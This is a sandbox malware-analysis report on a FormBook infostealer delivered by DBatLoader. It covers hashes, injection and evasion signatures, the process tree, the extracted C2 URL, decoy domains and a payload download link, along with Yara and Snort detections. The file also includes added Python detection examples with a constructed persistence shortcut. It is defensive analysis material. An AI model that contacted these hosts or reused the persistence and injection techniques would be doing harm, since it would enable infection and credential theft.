
Windows Analysis Report
0321423605241625.exe

Overview

General Information

Sample Name: 0321423605241625.exe
Analysis ID: 756155
MD5: edb1382c354ec6c09c53473e5335703a
SHA1: a1a5fbfce034731cba1072bab6b97b26c8a90c79
SHA256: c2c6eec67a1561c3a49179ddf756480876d92588c2e83d64246a04c3d724cb3d
Tags: exe, modiloader, xloader

Detection

DBatLoader, FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected DBatLoader
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • 0321423605241625.exe (PID: 3140 cmdline: C:\Users\user\Desktop\0321423605241625.exe MD5: EDB1382C354EC6C09C53473E5335703A)
    • colorcpl.exe (PID: 3576 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Mwqrxeuz.exe (PID: 5528 cmdline: "C:\Users\Public\Libraries\Mwqrxeuz.exe" MD5: EDB1382C354EC6C09C53473E5335703A)
          • colorcpl.exe (PID: 4028 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
        • raserver.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 4028 cmdline: /c del "C:\Windows\SysWOW64\colorcpl.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Malware Configuration

FormBook: {"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}
DBatLoader: {"Download Url": "https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo"}
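The process tree above is the kind of parent/child evidence an EDR or a Sysmon-based detection reasons over, so here is an added example (not part of the Joe Sandbox report) that runs that tree through four heuristics: a Windows system binary started by a program living in a user-writable path (the create-suspended-then-hollow pattern behind the "Creates a process in suspended mode" and "Sample uses process hollowing technique" signatures), a copy of the sample under C:\Users\Public, explorer.exe listed under a non-shell parent, and cmd.exe deleting a file under C:\Windows. The PIDs, command lines and MD5s are transcribed from the tree; the parent links follow its indentation, and the top-level sample is modelled with no parent because the report shows none. The PID 4028 reuse (colorcpl.exe and cmd.exe) is as printed in the report, which is why parents are linked by object rather than looked up by PID.

```python
"""Parent/child heuristics applied to the process tree of the report above.

Added example, not Joe Sandbox code. Process records are transcribed from the
tree (PIDs, command lines, MD5s as printed); parent links follow the tree's
indentation. The top-level sample is modelled with no parent.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

SAMPLE_MD5 = "EDB1382C354EC6C09C53473E5335703A"

USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "\\appdata\\", "\\temp\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SHELL_PARENTS = ("userinit.exe", "winlogon.exe", "explorer.exe")


@dataclass
class Proc:
    name: str
    pid: int
    cmdline: str
    md5: str
    parent: Proc | None = None

    def image_path(self) -> str:
        """First token of the command line when it is an absolute path, else ''."""
        s = self.cmdline.strip()
        if s.startswith('"'):
            return s[1:].split('"', 1)[0]
        first = s.split(" ", 1)[0]
        return first if re.match(r"[a-z]:\\", first, re.I) else ""


def in_any(path: str, needles: tuple[str, ...]) -> bool:
    p = path.lower()
    return any(n in p for n in needles)


def report_tree() -> list[Proc]:
    """The tree from the report, linked by object (PID 4028 appears twice)."""
    sample = Proc("0321423605241625.exe", 3140, "C:\\Users\\user\\Desktop\\0321423605241625.exe", SAMPLE_MD5)
    colorcpl_a = Proc("colorcpl.exe", 3576, "C:\\Windows\\System32\\colorcpl.exe", "746F3B5E7652EA0766BA10414D317981", sample)
    explorer = Proc("explorer.exe", 3324, "C:\\Windows\\Explorer.EXE", "AD5296B280E8F522A8A897C96BAB0E1D", colorcpl_a)
    mwqrxeuz = Proc("Mwqrxeuz.exe", 5528, '"C:\\Users\\Public\\Libraries\\Mwqrxeuz.exe"', SAMPLE_MD5, explorer)
    colorcpl_b = Proc("colorcpl.exe", 4028, "C:\\Windows\\System32\\colorcpl.exe", "746F3B5E7652EA0766BA10414D317981", mwqrxeuz)
    raserver = Proc("raserver.exe", 5928, "C:\\Windows\\SysWOW64\\raserver.exe", "2AADF65E395BFBD0D9B71D7279C8B5EC", explorer)
    cmd = Proc("cmd.exe", 4028, '/c del "C:\\Windows\\SysWOW64\\colorcpl.exe"', "F3BDBE3BB6F734E357235F4D5898582D", raserver)
    conhost = Proc("conhost.exe", 1412, "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1", "EA777DEEA782E8B4D7C7C33BBF8A4496", cmd)
    return [sample, colorcpl_a, explorer, mwqrxeuz, colorcpl_b, raserver, cmd, conhost]


def analyze(procs: list[Proc], sample_md5: str) -> list[tuple[str, int, str]]:
    """Return (tag, pid, explanation) triples, one per heuristic hit."""
    findings: list[tuple[str, int, str]] = []
    for p in procs:
        img, par = p.image_path(), p.parent
        # 1. A system binary started, with no arguments, by something in a
        #    user-writable path: the create-suspended-and-hollow pattern.
        if par and in_any(img, SYSTEM_DIRS) and in_any(par.image_path(), USER_WRITABLE):
            findings.append(("hollowing-candidate", p.pid,
                             f"{p.name} started by {par.name} (PID {par.pid}) from {par.image_path()}"))
        # 2. Same hash as the submitted sample, now living under C:\Users\Public.
        if p.md5.upper() == sample_md5.upper() and in_any(img, ("c:\\users\\public\\",)):
            findings.append(("self-copy", p.pid, f"sample copied to {img}"))
        # 3. explorer.exe normally descends from userinit/winlogon; in a sandbox
        #    tree any other parent marks an injection into the running shell.
        if p.name.lower() == "explorer.exe" and par and par.name.lower() not in SHELL_PARENTS:
            findings.append(("explorer-child", p.pid, f"explorer.exe listed under {par.name} (PID {par.pid})"))
        # 4. cmd.exe deleting something under C:\Windows: cleanup of a dropped copy.
        m = re.search(r'\bdel\s+"?([^"]+?)"?\s*$', p.cmdline, re.I)
        if p.name.lower() == "cmd.exe" and m and m.group(1).lower().startswith("c:\\windows\\"):
            findings.append(("windows-file-delete", p.pid, f"deletes {m.group(1)}"))
    return findings


if __name__ == "__main__":
    for tag, pid, why in analyze(report_tree(), SAMPLE_MD5):
        print(f"{tag:20} PID {pid:<5} {why}")
```

Note what these rules do not catch: raserver.exe is started by explorer.exe, which is exactly what a legitimate start looks like, so parent/child logic alone is silent on it. That edge is only suspicious in combination with the report's in-memory evidence (thread-context modification, APC queuing, foreign memory writes), which is why the sandbox signatures rather than the tree carry the verdict there.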
Yara Overview: dropped files (Source | Rule | Description | Author | Strings)

C:\Users\Public\Libraries\zuexrqwM.url
  Rule: Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x58:$hotkey: \x0AHotKey=2
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\zuexrqwM.url
  Rule: Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
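The two methodology rules above key on three things in the dropped .url file: an explicit [InternetShortcut] section at offset 0, a URL= entry (at 0x14, which is exactly where it lands when the section header is followed by CRLF), and a HotKey= entry whose value starts with 2. The following is an added example, not code from the report or from the rule author, that parses a .url file and turns those indicators into findings. The sample file is constructed: the report shows only the offsets and the first byte of the HotKey value, so the URL target (pointing at the dropped Mwqrxeuz.exe) and the full HotKey value are hypothetical.

```python
"""Parse a Windows .url (InternetShortcut) file and flag the persistence
indicators the Methodology_Shortcut_* Yara rules above key on.

Added example, not part of the Joe Sandbox report. SAMPLE_URL_FILE is
constructed: the URL target and the HotKey value are hypothetical, chosen so
that the [InternetShortcut] and URL= offsets match the report's 0x0 and 0x14.
"""
from __future__ import annotations

from urllib.parse import urlparse

EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".cmd", ".bat", ".ps1", ".vbs", ".js", ".hta", ".cpl")
WEB_SCHEMES = ("http", "https")

SAMPLE_URL_FILE = (  # constructed, see lead-in
    b"[InternetShortcut]\r\n"
    b"URL=file:///C:/Users/Public/Libraries/Mwqrxeuz.exe\r\n"  # hypothetical target
    b"HotKey=2\r\n"                                             # hypothetical value
    b"IDList=\r\n"
)
BENIGN_URL_FILE = b"[InternetShortcut]\r\nURL=https://www.example.com/\r\n"

# The byte strings the two Yara rules look for.
RULE_STRINGS = {
    "$url_explicit": b"[InternetShortcut]",
    "$file": b"URL=",
    "$hotkey": b"\nHotKey=",
}


def parse_internet_shortcut(data: bytes) -> dict[str, dict[str, str]]:
    """INI-style parse into {section: {key: value}}; keys are lower-cased.
    Accepts CRLF or LF line endings and an optional UTF-8 BOM."""
    text = data.decode("utf-8-sig", errors="replace")
    sections: dict[str, dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line:
            key, _, value = line.partition("=")
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


def yara_string_offsets(data: bytes) -> dict[str, int]:
    """First offset of each rule string, as the report's Strings column shows (-1 if absent)."""
    return {name: data.find(needle) for name, needle in RULE_STRINGS.items()}


def assess_internet_shortcut(data: bytes) -> list[str]:
    """Human-readable findings; an empty list means nothing suspicious."""
    findings: list[str] = []
    shortcut = parse_internet_shortcut(data).get("internetshortcut")
    if shortcut is None:
        return ["no [InternetShortcut] section: not a .url shortcut"]

    url = shortcut.get("url", "")
    scheme = urlparse(url).scheme.lower()
    if len(scheme) == 1:          # "C:\..." parses as scheme "c": treat as a local path
        scheme = "file"
    if scheme not in WEB_SCHEMES:
        findings.append(f"URL uses non-web scheme {scheme!r}: {url}")
        if url.lower().rstrip("/").endswith(EXECUTABLE_SUFFIXES):
            findings.append(f"URL target is a local executable: {url}")

    if "hotkey" in shortcut:
        findings.append(f"HotKey={shortcut['hotkey']}: shortcut fires on a key combination")
    return findings


if __name__ == "__main__":
    for name, off in yara_string_offsets(SAMPLE_URL_FILE).items():
        print(f"0x{off:x}:{name}")
    for finding in assess_internet_shortcut(SAMPLE_URL_FILE):
        print("-", finding)
```

On the constructed file the $url_explicit and $file offsets reproduce the report (0x0 and 0x14); $hotkey lands earlier than the report's 0x58 because the real URL line is longer than the hypothetical one. A benign shortcut to a web page with no HotKey produces no findings.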
Yara Overview: memory dumps (Source | Rule | Description | Author | Strings)

00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook | Yara detected FormBook | Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6191:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1aee0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x97ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x148b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(57 further memory-dump matches are collapsed in the original report and not shown here)

Yara Overview: unpacked PEs (Source | Rule | Description | Author | Strings)

1.2.colorcpl.exe.10410000.3.raw.unpack
  Rule: JoeSecurity_FormBook | Yara detected FormBook | Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6191:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1aee0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x97ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x148b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
1.0.colorcpl.exe.10410000.3.unpack
  Rule: JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(38 further unpacked-PE matches are collapsed in the original report and not shown here)
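Each "offset:$name: bytes" entry above is a Yara hex string reported at the position where it was found in the dump; the same offsets recur in the memory dump and in the unpacked PE because both are images of the same FormBook payload. Worth noticing while reading them: $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) is `add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax`, the timing measurement behind the "Tries to detect virtualization through RDTSC time measurements" signature. The following is an added example, not code from the report or from the rule authors, that re-implements enough of Yara's hex-string matching to show how these offsets are produced. The four patterns are the $a1..$a4 strings of Windows_Trojan_Formbook_1112e116 exactly as printed; the scanned buffer is constructed (zero-filled, with those patterns planted at the reported offsets), not the real colorcpl.exe dump. The scanner goes one step beyond the rule as printed and also accepts Yara's `??` wildcard byte.

```python
"""Minimal Yara-style hex-string scanner, to show how the "offset:$name: bytes"
entries in the tables above come about.

Added example, not Joe Sandbox or rule-author code. The four patterns and the
offsets are the report's; the buffer is CONSTRUCTED (zeros with the patterns
planted at those offsets), not the actual memory dump.
"""
from __future__ import annotations

import re

# $a1..$a4 of Windows_Trojan_Formbook_1112e116, as printed in the report.
FORMBOOK_1112E116 = {
    "$a1": "3C 30 50 4F 53 54 74 09 40",
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
    "$a4": "04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83",
}
# Offsets the report lists for the unpacked colorcpl.exe image.
REPORTED_OFFSETS = {"$a1": 0x6191, "$a2": 0x1AEE0, "$a3": 0x97EF, "$a4": 0x148B7}


def hex_pattern_to_regex(pattern: str) -> re.Pattern[bytes]:
    """Turn a Yara hex string ('3C 30 ?? 4F') into a bytes regex.
    '??' is a wildcard byte; everything else is matched literally."""
    parts = []
    for tok in pattern.split():
        parts.append(b"." if tok == "??" else re.escape(bytes([int(tok, 16)])))
    # Zero-width lookahead so overlapping occurrences are all reported, as Yara does.
    return re.compile(b"(?=" + b"".join(parts) + b")", re.DOTALL)


def scan(buf: bytes, strings: dict[str, str]) -> dict[str, list[int]]:
    """Every offset at which each named hex string occurs in buf."""
    return {name: [m.start() for m in hex_pattern_to_regex(pat).finditer(buf)]
            for name, pat in strings.items()}


def rule_fires(hits: dict[str, list[int]], required: int = 1) -> bool:
    """Yara's 'N of them' condition: at least `required` distinct strings matched."""
    return sum(1 for offsets in hits.values() if offsets) >= required


def build_sample_buffer(size: int = 0x1B000) -> bytes:
    """CONSTRUCTED stand-in for the dump: zeros with the patterns planted
    at the offsets the report lists."""
    buf = bytearray(size)
    for name, off in REPORTED_OFFSETS.items():
        raw = bytes.fromhex(FORMBOOK_1112E116[name])
        buf[off:off + len(raw)] = raw
    return bytes(buf)


def format_like_report(hits: dict[str, list[int]], strings: dict[str, str]) -> list[str]:
    """Render hits the way the report's Strings column does."""
    return [f"0x{off:x}:{name}: {strings[name]}"
            for name, offsets in hits.items() for off in offsets]


if __name__ == "__main__":
    sample = build_sample_buffer()
    found = scan(sample, FORMBOOK_1112E116)
    for line in format_like_report(found, FORMBOOK_1112E116):
        print(line)
    print("rule fires (any of them):", rule_fires(found))
    print("wildcard demo:", scan(sample, {"$w": "74 0A 4E ?? B6 08"}))
```

Running it reproduces the four lines from the table, and the wildcard pattern `74 0A 4E ?? B6 08` lands on the $a2 offset as the first six bytes of that string allow. Against a real dump, feed the file's bytes to `scan` instead of `build_sample_buffer()`; the point of planting the patterns here is only to make the example self-contained.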
          No Sigma rule has matched
Snort IDS alerts (all TCP, classtype "A Network Trojan was detected"):

Timestamp                 Source               Destination        SID
11/29/22-18:26:08.582417  192.168.2.5:49715    192.0.78.141:80    2031453
11/29/22-18:26:08.582417  192.168.2.5:49715    192.0.78.141:80    2031449
11/29/22-18:26:08.582417  192.168.2.5:49715    192.0.78.141:80    2031412
11/29/22-18:26:23.800962  192.168.2.5:49717    52.85.92.84:80     2031453
11/29/22-18:26:23.800962  192.168.2.5:49717    52.85.92.84:80     2031412
11/29/22-18:26:23.800962  192.168.2.5:49717    52.85.92.84:80     2031449
11/29/22-18:26:33.912103  192.168.2.5:49719    217.160.0.95:80    2031453
11/29/22-18:26:33.912103  192.168.2.5:49719    217.160.0.95:80    2031412
11/29/22-18:26:33.912103  192.168.2.5:49719    217.160.0.95:80    2031449


          AV Detection

Source: 0321423605241625.exe | ReversingLabs: Detection: 35%
Source: 0321423605241625.exe | Virustotal: Detection: 40%
Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: 0321423605241625.exe | Avira: detected
Source: www.rematedeldia.com/euv4/ | Avira URL Cloud: Label: malware
Source: C:\Users\Public\Libraries\Mwqrxeuz.exe | Avira: detection malicious, Label: HEUR/AGEN.1214697
Source: C:\Users\Public\Libraries\Mwqrxeuz.exe | ReversingLabs: Detection: 35%
Source: 0321423605241625.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Mwqrxeuz.exe | Joe Sandbox ML: detected
Source: 1.0.colorcpl.exe.10410000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.0321423605241625.exe.2170000.0.unpack | Avira: Label: TR/Hijacker.Gen
Source: 1.0.colorcpl.exe.10410000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.raserver.exe.525796c.4.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.0.colorcpl.exe.10410000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.colorcpl.exe.10410000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.raserver.exe.a3cda0.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.0.colorcpl.exe.10410000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.0321423605241625.exe.2231218.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0321423605241625.exe | Malware Configuration Extractor: DBatLoader {"Download Url": "https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo"}
Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}
Source: 0321423605241625.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: Binary string: colorcpl.pdbGCTL | source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: colorcpl.pdb | source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
